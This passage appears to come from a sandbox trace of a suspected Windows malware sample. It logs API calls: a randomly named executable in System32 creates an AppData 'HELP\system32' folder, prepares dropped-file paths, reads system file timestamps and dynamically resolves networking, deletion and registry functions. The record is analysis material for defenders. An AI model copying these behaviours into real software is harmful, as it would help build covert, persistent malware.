SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.893] SetLastError (dwErrCode=0x0) [0032.893] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.894] SetLastError (dwErrCode=0x0) [0032.894] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.895] SetLastError (dwErrCode=0x0) [0032.895] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.896] GetLastError () returned 0x0 [0032.896] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.897] SetLastError (dwErrCode=0x0) [0032.897] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.898] SetLastError (dwErrCode=0x0) [0032.898] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.899] SetLastError (dwErrCode=0x0) [0032.899] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.907] GetLastError () returned 0x0 [0032.907] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.908] SetLastError (dwErrCode=0x0) [0032.908] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.909] GetLastError () returned 0x0 [0032.909] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.910] SetLastError (dwErrCode=0x0) [0032.910] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.911] SetLastError (dwErrCode=0x0) [0032.911] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.912] SetLastError (dwErrCode=0x0) [0032.912] GetLastError () returned 0x0 [0032.913] SetLastError (dwErrCode=0x0) [0032.913] GetLastError () returned 0x0 [0032.913] SetLastError (dwErrCode=0x0) [0032.913] GetLastError () returned 0x0 [0032.913] SetLastError (dwErrCode=0x0) [0032.913] GetLastError () returned 0x0 [0032.913] SetLastError (dwErrCode=0x0) [0032.913] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.913] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.913] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf838 | out: lpSystemTimeAsFileTime=0x1cf838*(dwLowDateTime=0xe15641d0, dwHighDateTime=0x1d3dfba)) [0032.914] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf770, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.915] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf658, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetLastError () returned 0x0 [0032.915] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.915] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.915] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.916] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.916] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.916] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.916] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.916] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.916] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.916] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.916] GetLastError () returned 0xb7 [0032.916] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.916] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.916] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.916] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.916] wsprintfA (in: param_1=0x1cf4d8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.916] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.916] wsprintfA (in: param_1=0x1cf3d4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.916] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.916] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.916] CloseHandle (hObject=0x74) returned 1 [0032.917] GetLastError () returned 0x0 [0032.917] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.917] GetLastError () returned 0x0 [0032.917] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.917] GetSystemDirectoryA (in: lpBuffer=0x1cf4d8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.917] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.917] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.917] CloseHandle (hObject=0x74) returned 1 [0032.917] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.917] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.917] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.918] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.918] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.919] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.919] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.919] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.919] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.919] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.919] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.920] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.921] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.921] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.921] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.921] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.921] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.921] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.922] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.922] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.922] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.922] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: 